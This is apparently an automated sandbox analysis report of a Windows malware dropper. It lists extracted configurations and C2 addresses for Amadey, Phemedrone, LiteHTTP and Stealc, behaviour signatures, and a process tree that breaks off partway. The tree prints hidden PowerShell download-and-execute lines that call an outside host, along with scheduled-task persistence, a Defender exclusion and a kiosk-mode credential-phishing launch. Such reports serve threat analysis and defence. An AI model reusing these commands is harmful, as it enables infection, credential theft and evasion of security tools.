Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 17:09

General

  • Target

    0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe

  • Size

    1.8MB

  • MD5

    f7a071c71dd7454582afb12eb5f488ca

  • SHA1

    548af1bd92331df854dd8bd1d920601b9c7b4e96

  • SHA256

    0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a

  • SHA512

    491361ba6440c899756e1d486ea24c09d3c88fb9cd8d697a1bc88617fad522f297cdfce38d224bd6a0c3705b95ccb83eeee6216fd561332382286d448402af5c

  • SSDEEP

    24576:8batnOjZKIChJftECqSwAKyG7ljmZK4X1943gyQHfXFxQCCBzxCcSUpxs:8baaZmFZ/w1R+zU3zQHfXbQPRou7s

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Phemedrone

    An information and wallet stealer written in C#.

  • Phemedrone family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 15 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 46 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe
    "C:\Users\Admin\AppData\Local\Temp\0cf46f77dad041ea3bee44d25c1f7324596566fe83b740c7ee149052a6dc3f9a.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2168
      • C:\Users\Admin\AppData\Local\Temp\10104610101\b2a880b369.exe
        "C:\Users\Admin\AppData\Local\Temp\10104610101\b2a880b369.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:896
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn RQTGumaNuEt /tr "mshta C:\Users\Admin\AppData\Local\Temp\7V9Vr6xXY.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2692
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn RQTGumaNuEt /tr "mshta C:\Users\Admin\AppData\Local\Temp\7V9Vr6xXY.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2340
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\7V9Vr6xXY.hta
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:3028
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3032
            • C:\Users\Admin\AppData\Local\TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE
              "C:\Users\Admin\AppData\Local\TempIYXCIKUJKM63MDSNYJIO2MQQJ31BIOFE.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2452
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2292
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:2200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2424
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:236
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1572
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:776
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1944
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "cWGp4maewvd" /tr "mshta \"C:\Temp\wsUzR7ZEx.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1544
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\wsUzR7ZEx.hta"
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          PID:2440
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1664
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2704
      • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
        "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1780
        • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
          "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:2996
          • C:\Users\Admin\AppData\Roaming\dw4I35Ut3X.exe
            "C:\Users\Admin\AppData\Roaming\dw4I35Ut3X.exe"
            5⤵
            • Executes dropped EXE
            PID:2960
          • C:\Users\Admin\AppData\Roaming\CnVf3x0mxd.exe
            "C:\Users\Admin\AppData\Roaming\CnVf3x0mxd.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2988
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2988 -s 1580
              6⤵
                PID:2484
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 504
            4⤵
            • Loads dropped DLL
            • Program crash
            PID:3068
        • C:\Users\Admin\AppData\Local\Temp\10104850101\5af08d2768.exe
          "C:\Users\Admin\AppData\Local\Temp\10104850101\5af08d2768.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1096
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            4⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2240
        • C:\Users\Admin\AppData\Local\Temp\10104860101\7817fe6500.exe
          "C:\Users\Admin\AppData\Local\Temp\10104860101\7817fe6500.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1132
          • C:\Users\Admin\AppData\Local\Temp\10104860101\7817fe6500.exe
            "C:\Users\Admin\AppData\Local\Temp\10104860101\7817fe6500.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1944
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 1012
              5⤵
              • Loads dropped DLL
              • Program crash
              PID:664
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 516
            4⤵
            • Loads dropped DLL
            • Program crash
            PID:2288
        • C:\Users\Admin\AppData\Local\Temp\10104870101\d52ccaca11.exe
          "C:\Users\Admin\AppData\Local\Temp\10104870101\d52ccaca11.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2692
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            4⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1204
        • C:\Users\Admin\AppData\Local\Temp\10104880101\32d42439b0.exe
          "C:\Users\Admin\AppData\Local\Temp\10104880101\32d42439b0.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2304
        • C:\Users\Admin\AppData\Local\Temp\10104890101\4f7305716b.exe
          "C:\Users\Admin\AppData\Local\Temp\10104890101\4f7305716b.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2032
        • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
          "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1444
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\xYYgnj9o\Anubis.exe""
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:3212
        • C:\Users\Admin\AppData\Local\Temp\10104920101\70b73e7ec3.exe
          "C:\Users\Admin\AppData\Local\Temp\10104920101\70b73e7ec3.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2068
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 1228
            4⤵
            • Loads dropped DLL
            • Program crash
            PID:1216
        • C:\Users\Admin\AppData\Local\Temp\10104930101\0f27b08ee4.exe
          "C:\Users\Admin\AppData\Local\Temp\10104930101\0f27b08ee4.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2336
        • C:\Users\Admin\AppData\Local\Temp\10104940101\49f4ed094b.exe
          "C:\Users\Admin\AppData\Local\Temp\10104940101\49f4ed094b.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1772
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM firefox.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1840
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM chrome.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2368
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM msedge.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2228
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM opera.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2408
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM brave.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:692
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
            4⤵
              PID:2716
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                5⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1108
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.0.541618555\606097230" -parentBuildID 20221007134813 -prefsHandle 1252 -prefMapHandle 1248 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53047677-781b-4a33-906c-33dc77728a43} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 1320 fafa458 gpu
                  6⤵
                    PID:1456
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.1.1549847346\180608095" -parentBuildID 20221007134813 -prefsHandle 1500 -prefMapHandle 1496 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2d07c34-f0fb-4157-af44-97a8877bccfc} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 1528 43eca58 socket
                    6⤵
                      PID:704
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.2.96235492\933566631" -childID 1 -isForBrowser -prefsHandle 2132 -prefMapHandle 1864 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 668 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78492c6f-e0b0-46d1-a8b6-6cdf69e401aa} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 2076 190c2258 tab
                      6⤵
                        PID:1312
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.3.1124784581\301159656" -childID 2 -isForBrowser -prefsHandle 2824 -prefMapHandle 2820 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 668 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {85e79fe2-932a-4930-9120-76acc677477a} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 2836 1c506258 tab
                        6⤵
                          PID:928
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.4.863932168\204475506" -childID 3 -isForBrowser -prefsHandle 3952 -prefMapHandle 3948 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 668 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4aa0f5cf-91f5-4e77-826f-fa32a177820a} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 3964 1e708e58 tab
                          6⤵
                            PID:2700
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.5.1747489349\619651118" -childID 4 -isForBrowser -prefsHandle 4100 -prefMapHandle 4104 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 668 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebcc1e3b-76ab-487e-89c5-3b9b1fcbd1bf} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 4084 1fa6e458 tab
                            6⤵
                              PID:2104
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1108.6.726261667\150152844" -childID 5 -isForBrowser -prefsHandle 4284 -prefMapHandle 4288 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 668 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de51b9f0-f772-49ff-b7a8-00821673e63b} 1108 "\\.\pipe\gecko-crash-server-pipe.1108" 4272 1fa70b58 tab
                              6⤵
                                PID:1468
                        • C:\Users\Admin\AppData\Local\Temp\10104950101\ce0fdbb4c7.exe
                          "C:\Users\Admin\AppData\Local\Temp\10104950101\ce0fdbb4c7.exe"
                          3⤵
                          • Modifies Windows Defender DisableAntiSpyware settings
                          • Modifies Windows Defender Real-time Protection settings
                          • Modifies Windows Defender TamperProtection settings
                          • Modifies Windows Defender notification settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:980
                        • C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe
                          "C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:3392
                        • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                          "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:3484
                          • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                            "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:3548
                            • C:\Users\Admin\AppData\Roaming\xaGMTokN7L.exe
                              "C:\Users\Admin\AppData\Roaming\xaGMTokN7L.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:3676
                            • C:\Users\Admin\AppData\Roaming\BSVOQewEKZ.exe
                              "C:\Users\Admin\AppData\Roaming\BSVOQewEKZ.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3692
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 3692 -s 616
                                6⤵
                                  PID:2336
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 500
                              4⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:3612
                          • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                            "C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            PID:788
                            • C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe
                              "C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"
                              4⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3480
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 788 -s 500
                              4⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:3620
                          • C:\Users\Admin\AppData\Local\Temp\10104990101\SvhQA35.exe
                            "C:\Users\Admin\AppData\Local\Temp\10104990101\SvhQA35.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:3992
                            • C:\Users\Admin\AppData\Local\Temp\onefile_3992_133856683044051000\chromium.exe
                              C:\Users\Admin\AppData\Local\Temp\10104990101\SvhQA35.exe
                              4⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:3292
                          • C:\Users\Admin\AppData\Local\Temp\10105000101\FvbuInU.exe
                            "C:\Users\Admin\AppData\Local\Temp\10105000101\FvbuInU.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            PID:3736
                          • C:\Users\Admin\AppData\Local\Temp\10105010101\Ps7WqSx.exe
                            "C:\Users\Admin\AppData\Local\Temp\10105010101\Ps7WqSx.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3300
                          • C:\Users\Admin\AppData\Local\Temp\10105020101\zY9sqWs.exe
